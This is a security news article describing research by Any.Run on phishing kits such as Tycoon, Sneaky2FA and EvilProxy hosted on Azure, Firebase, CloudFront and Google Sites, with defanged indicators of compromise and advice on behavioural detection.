Threat actors are increasingly hosting phishing kits on legitimate cloud and Content Delivery Network (CDN) platforms, posing a significant challenge for cybersecurity defenses. This evolving tactic, identified by researchers at Any.Run, moves away from traditional phishing methods that rely on newly registered, suspicious domains. Instead, attackers are leveraging trusted infrastructure from major providers like Google, Microsoft Azure, and AWS CloudFront, making their malicious campaigns harder to detect and block.
This shift to using legitimate cloud infrastructure for phishing kits means that malicious websites can appear trustworthy to unsuspecting users. By disguising their operations within the vast network of established technology companies, cybercriminals effectively bypass many standard security filters. This approach is particularly concerning as these campaigns are reportedly targeting enterprise users specifically, aiming to steal corporate credentials rather than general email accounts.
The Rise of Cloud-Hosted Phishing Infrastructure
The utilization of legitimate cloud and CDN platforms for hosting phishing kits represents a concerning escalation in social engineering attacks. Victims encountering these fake login pages are more likely to fall for the scam because they recognize the domain names of well-known technology companies. Traditional network monitoring tools also struggle to identify these threats, as they register ordinary HTML content being served from legitimate services, rather than flagging suspicious traffic patterns typically associated with malicious sites.
Researchers at Any.Run observed this growing trend while analyzing various phishing kit families. Their findings indicate that the Tycoon phishing kit, for instance, is operating from Microsoft Azure Blob Storage, utilizing the domain alencure[.]blob[.]core[.]windows[.]net. This specific example highlights how attackers are embedding their malicious content within legitimate cloud storage services.
Further analysis revealed that the Sneaky2FA phishing kit is being hosted on Firebase Cloud Storage at firebasestorage[.]googleapis[.]com and AWS CloudFront at cloudfront[.]net. These kits are designed to mimic Microsoft 365 login pages, aiming to harvest corporate account credentials. Another notable example is the EvilProxy phishing kit, which leverages Google Sites at sites[.]google[.]com to host its deceptive web pages.
Detection and Response Challenges with Cloud-Hosted Phishing
The employment of legitimate cloud and CDN platforms introduces unique obstacles for security teams tasked with detecting and responding to phishing threats. Conventional methods that rely on checking domain reputation are largely ineffective because the underlying hosting platforms are legitimate services used by countless organizations for benign purposes. Consequently, most security vendors classify these cloud domains as safe, which is technically accurate; the malicious activity stems from the content being served, not the infrastructure itself.
Effective detection of these evolving threats necessitates a shift towards behavioral analysis rather than solely relying on domain reputation checks. Security platforms must be equipped to examine user interactions with cloud-hosted pages and identify suspicious patterns in real-time. For instance, the Any.Run Sandbox environment has demonstrated its capability to expose these types of threats within seconds, significantly reducing both the mean time to detect and the mean time to respond.
To combat this growing threat, organizations should implement threat intelligence lookups that specifically target abuse patterns on platforms such as Microsoft Azure Blob Storage, Firebase Cloud Storage, and Google Sites. By focusing on these indicators, security teams can proactively identify and mitigate these sophisticated phishing campaigns. Related indicators of compromise that have been identified in connection with these campaigns include mphdvh[.]icu, kamitore[.]com, aircosspascual[.]com, and Lustefea[.]my[.]id.
The ongoing evolution of phishing tactics, particularly the move towards leveraging established cloud infrastructure, indicates that attackers will continue to seek out and exploit trusted services. Security vendors and organizations will need to adapt their detection strategies to focus on content and user behavior, rather than solely on domain reputation. Continuous monitoring and rapid threat intelligence sharing will be crucial in staying ahead of these sophisticated social engineering attacks.